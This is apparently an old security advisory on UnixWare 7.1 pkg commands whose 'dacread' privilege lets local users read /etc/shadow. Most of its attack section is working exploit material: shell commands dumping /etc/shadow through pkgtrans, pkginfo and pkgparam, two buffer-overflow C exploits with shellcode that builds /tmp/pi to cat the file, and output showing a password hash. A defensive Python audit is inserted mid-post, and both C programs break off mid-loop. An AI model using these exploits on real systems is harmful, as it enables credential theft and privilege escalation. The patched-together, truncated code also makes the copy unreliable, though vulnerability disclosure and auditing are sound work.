Greetings,

OVERVIEW

Most of UnixWare's pkg commands can be exploited to print /etc/shadow, leading to a probable root compromise.

BACKGROUND

Only tested on UnixWare 7.1.

DETAILS

The permissions for the UnixWare pkg commands are as follows:

bash-2.02$ ls -la /usr/sbin/pkgchk /usr/bin/pkginfo /usr/bin/pkgparam /usr/bin/pkgtrans /usr/sadm/install/bin/pkgname /usr/sbin/pkgcat /usr/sbin/pkginstall
-r-xr-xr-x   1 bin   sys   176620 May 21  1999 /usr/bin/pkginfo
-r-xr-xr-x   1 root  sys   166784 May 21  1999 /usr/bin/pkgparam
-r-xr-xr-x   1 bin   bin   166216 May 21  1999 /usr/bin/pkgtrans
-r-xr-xr-x   1 root  sys     3288 May 21  1999 /usr/sadm/install/bin/pkgname
-rwxr-xr-x   1 root  bin    19436 May 21  1999 /usr/sbin/pkgcat
-r-x------   1 root  sys   179440 May 21  1999 /usr/sbin/pkgchk
-rwxr-xr-x   1 root  bin    19680 May 21  1999 /usr/sbin/pkginstall
bash-2.02$

Note that none of these have any elevated mode-bit-based privileges (no set-uid or set-gid bits). Now let's check out /etc/security/tcb/privs:

bash-2.02$ cat /etc/security/tcb/privs | grep pkg
179440:2448:939918606:%fixed,dacread:/usr/sbin/pkgchk
176620:53979:939918610:%fixed,dacread:/usr/bin/pkginfo
166784:32218:939918610:%fixed,dacread:/usr/bin/pkgparam
166216:46675:939918610:%fixed,dacread:/usr/bin/pkgtrans
3288:61136:939918611:%fixed,dacread:/usr/sadm/install/bin/pkgname
19436:55289:939918607:%fixed,dacread:/usr/sbin/pkgcat
19680:23331:939918607:%fixed,dacread:/usr/sbin/pkginstall

As far as I can tell, the pkgname program doesn't actually do anything, and we obviously can't exec pkgchk (it is mode 0500, executable by root only). The rest of these programs are all vulnerable to /etc/shadow printing exploits. The pkg* programs are able to read /etc/shadow because of the "dacread" privilege, which allows the process to override the file's permission bits and ownership (but only for reading or executing, not writing). Two of the exploits below are buffer overflow exploits which execute /tmp/pi. /tmp/pi is a program built by the exploit which simply cats /etc/shadow. Because the privilege is attached to the process, any process spawned by a privileged program gains the same privileges as that program.
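The combination that makes six of the seven entries above exploitable is a fixed privilege in the privs table plus a mode that lets ordinary users execute the binary; pkgchk carries the same dacread privilege but is mode 0500 and so is not reachable. The audit below, an added example that is not code from the advisory, parses privs-table lines in the five-field format shown above (size:checksum:mtime:%kind,privs:path), cross-checks each entry against the file's mode and size, and flags fixed privileges on binaries that group or other can execute, plus entries whose recorded size no longer matches the binary. The sample table and the (mode, size) pairs are transcribed from the advisory's output; reading the table from a string, the stat_lookup callable and all function names are assumptions made so it runs offline.

```python
"""Audit a UnixWare-style /etc/security/tcb/privs table.

Added example, not code from the advisory. The line format, the seven entries
and the file modes are copied from the advisory's output; reading the table
from a string and the stat_lookup callable are assumptions for an offline run.
"""
import stat
from dataclasses import dataclass

# The advisory's `grep pkg` of /etc/security/tcb/privs (constructed copy).
SAMPLE_PRIVS = """\
179440:2448:939918606:%fixed,dacread:/usr/sbin/pkgchk
176620:53979:939918610:%fixed,dacread:/usr/bin/pkginfo
166784:32218:939918610:%fixed,dacread:/usr/bin/pkgparam
166216:46675:939918610:%fixed,dacread:/usr/bin/pkgtrans
3288:61136:939918611:%fixed,dacread:/usr/sadm/install/bin/pkgname
19436:55289:939918607:%fixed,dacread:/usr/sbin/pkgcat
19680:23331:939918607:%fixed,dacread:/usr/sbin/pkginstall
"""

# (mode, size) per path, transcribed from the advisory's `ls -la` listing.
# On a live host replace this with os.stat(path).st_mode / st_size.
SAMPLE_STAT = {
    "/usr/sbin/pkgchk":              (0o500, 179440),
    "/usr/bin/pkginfo":              (0o555, 176620),
    "/usr/bin/pkgparam":             (0o555, 166784),
    "/usr/bin/pkgtrans":             (0o555, 166216),
    "/usr/sadm/install/bin/pkgname": (0o555, 3288),
    "/usr/sbin/pkgcat":              (0o755, 19436),
    "/usr/sbin/pkginstall":          (0o755, 19680),
}


@dataclass(frozen=True)
class PrivEntry:
    size: int
    checksum: int
    mtime: int
    kind: str      # "fixed" (from the "%fixed" field) or another keyword
    privs: tuple   # privilege names, e.g. ("dacread",)
    path: str


def parse_privs(text):
    """Parse privs-table lines. The path is the last field and may itself
    contain ':', so the line is split at most four times."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":", 4)
        if len(fields) != 5:
            raise ValueError(f"privs line {lineno}: expected 5 colon-separated fields")
        size, cksum, mtime, privfield, path = fields
        kind, _, privlist = privfield.partition(",")
        privs = tuple(p for p in privlist.split(",") if p)
        entries.append(PrivEntry(int(size), int(cksum), int(mtime),
                                 kind.lstrip("%"), privs, path))
    return entries


def audit(entries, stat_lookup):
    """Return (path, reason) findings: fixed privileges on a binary that
    group/other can execute, or a size that no longer matches the table."""
    findings = []
    for e in entries:
        mode, size = stat_lookup(e.path)
        if size != e.size:
            findings.append((e.path, f"size {size} differs from privs table ({e.size})"))
        reachable = bool(mode & (stat.S_IXGRP | stat.S_IXOTH))
        if e.kind == "fixed" and e.privs and reachable:
            findings.append((e.path,
                             f"fixed privilege(s) {','.join(e.privs)} on a binary "
                             f"executable by group/other (mode {stat.S_IMODE(mode):04o})"))
    return findings


def reachable_privileged_paths(text=SAMPLE_PRIVS, stat_lookup=SAMPLE_STAT.get):
    """Sorted paths that audit() flags for the given table and stat source."""
    return sorted({path for path, _ in audit(parse_privs(text), stat_lookup)})


if __name__ == "__main__":
    for path, reason in audit(parse_privs(SAMPLE_PRIVS), SAMPLE_STAT.get):
        print(f"{path}: {reason}")
```

Run against the advisory's data it reports the six binaries other than pkgchk. The two remediations it points at are the ones the table itself suggests: drop the privilege from the entry, or restrict the mode to 0500 as pkgchk already is, so that only root can start the process that carries dacread. The size check is there because the table records the binary's size; a mismatch means the entry and the binary on disk have diverged and deserves a look.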
EXPLOIT OUTPUT

--------------
pkgtrans

For this exploit, download the attached "dut.tar" and follow the instructions below. dut.tar is simply a package directory that conforms to the pkgmap/pkginfo conventions, with install/shadow a symbolic link to /etc/shadow, so that pkgtrans reads /etc/shadow into the output datastream.

bash-2.02$ cp dut.tar /tmp
bash-2.02$ cd /tmp
bash-2.02$ tar xvf dut.tar
x dut/, 0 bytes, 0 tape blocks
x dut/pkginfo, 276 bytes, 1 tape block
x dut/pkgmap, 39 bytes, 1 tape block
x dut/install/, 0 bytes, 0 tape blocks
x dut/install/shadow symbolic link to /etc/shadow
bash-2.02$ pkgtrans -s /tmp /tmp/pkgtrans.shadow

The following packages are available:
  1  dut     Brock Tellier's pkgtrans exploit, install and cat /tmp/pkgtrans.shadow for your copy of /etc/shadow
             (IA32) .01a

Select package(s) you wish to process (or 'all' to process all packages). (default: all) [?,??,quit]: 1

Transferring package instance to in datastream format
bash-2.02$ cat /tmp/trans.shadow | grep root
root:rfAf3OC7XHsj.:10925::::::
bash-2.02$

-------------
pkginfo

bash-2.02$ truss -rall -aefo pkginfo.out pkginfo -d /etc/shadow; cat pkginfo.out | grep "r o o t"
UX:pkginfo: ERROR: attempt to process package from failed - bad format in datastream table-of-contents
truss: cannot control child process, pid# 9188
- KILL TRUSS PROCESS FROM ANOTHER VT -
Killed
9187:  r o o t : r f A f 3 O C 7 X H s j . : 1 0 9 2 5 : : : : : :\n d
bash-2.02$

-------------
pkginstall

bash-2.02$ /usr/sbin/pkginstall -s `./uwpkgi 100`:

UnixWare 7.1 pkginstall exploit prints/etc/shadow
Brock Tellier btellier@usa.net

Using addr: 0x8046c3d
root:rfAf3OC7XHsj.:10925::::::
daemon:NP:6445::::::
bin:NP:6445::::::
...

--------------
pkgcat

bash-2.02$ /usr/sbin/pkgcat -s `./uwpkgcat 100`:

UnixWare 7.1 pkgcat exploit prints/etc/shadow
Brock Tellier btellier@usa.net

Using addr: 0x8046c3d
root:rfAf3OC7XHsj.:10925::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
...

------------
pkgparam

bash-2.02$ pkgparam -f /etc/shadow
rfAf3OC7XHsj.:10925::::::
NP:6445::::::
NP:6445::::::
...
EXPLOITS

--- uwpkgcat.c ---

/**
 ** UnixWare 7.1 /usr/sbin/pkgcat exploit
 ** Prints contents of /etc/shadow (execing shell won't be enough here)
 ** Demonstrates overflow in uw71's gethostbyname() and dacread permission
 ** problems. Use offsets of +-100.
 **
 ** Compile cc -o uwpkgcat uwpkgcat.c
 ** run /usr/sbin/pkgcat -s `./uwpkgcat 100`:
 **
 ** Brock Tellier btellier@usa.net
 **/

/* header names were lost in this copy of the post; these cover fopen/fprintf,
   system/atoi/exit and strlen/memset/memcpy */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char scoshell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/pi\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

#define LEN 3500
#define NOP 0x90
#define CODE "void main() { system(\"cat /etc/shadow\"); }\n"

/* write and compile /tmp/pi, the program that pkgcat's privileged process will exec */
void buildpi() {
  FILE *fp;
  char cc[100];

  fp = fopen("/tmp/pi.c", "w");
  fprintf(fp, CODE);
  fclose(fp);

  snprintf(cc, sizeof(cc), "cc -o /tmp/pi /tmp/pi.c");
  system(cc);
}

int main(int argc, char *argv[]) {
  long int offset=0;
  int i;
  int buflen = LEN;
  long int addr;
  char buf[LEN];

  buildpi();

  if(argc > 3) {
    fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
    exit(0);
  }
  else if (argc == 2){
    offset=atoi(argv[1]);
  }
  else if (argc == 3) {
    offset=atoi(argv[1]);
    buflen=atoi(argv[2]);
  }
  else {
    offset=100;
    buflen=3000;
  }

  addr=0x8046b75 + offset;

  fprintf(stderr, "\nUnixWare 7.1 pkgcat exploit prints");
  fprintf(stderr, "/etc/shadow\n");
  fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
  fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

  memset(buf,NOP,buflen);
  memcpy(buf+(buflen/2),scoshell,strlen(scoshell));

  for(i=((buflen/2) + strlen(scoshell))+2;i

[remainder of uwpkgcat.c is missing from this copy of the post]

--- uwpkgi.c --- (the pkginstall exploit invoked above as ./uwpkgi; its header comment is missing from this copy)

/* header names were lost in this copy of the post; these cover fopen/fprintf,
   system/atoi/exit and strlen/memset/memcpy */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char scoshell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/pi\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

#define LEN 3500
#define NOP 0x90
#define CODE "void main() { system(\"cat /etc/shadow\"); }\n"

/* write and compile /tmp/pi, the program that pkginstall's privileged process will exec */
void buildpi() {
  FILE *fp;
  char cc[100];

  fp = fopen("/tmp/pi.c", "w");
  fprintf(fp, CODE);
  fclose(fp);

  snprintf(cc, sizeof(cc), "cc -o /tmp/pi /tmp/pi.c");
  system(cc);
}

int main(int argc, char *argv[]) {
  long int offset=0;
  int i;
  int buflen = LEN;
  long int addr;
  char buf[LEN];

  buildpi();

  if(argc > 3) {
    fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
    exit(0);
  }
  else if (argc == 2){
    offset=atoi(argv[1]);
  }
  else if (argc == 3) {
    offset=atoi(argv[1]);
    buflen=atoi(argv[2]);
  }
  else {
    offset=100;
    buflen=3000;
  }

  addr=0x8046b75 + offset;

  fprintf(stderr, "\nUnixWare 7.1 pkginstall exploit prints");
  fprintf(stderr, "/etc/shadow\n");
  fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
  fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

  memset(buf,NOP,buflen);
  memcpy(buf+(buflen/2),scoshell,strlen(scoshell));

  for(i=((buflen/2) + strlen(scoshell))+2;i

[remainder of uwpkgi.c is missing from this copy of the post]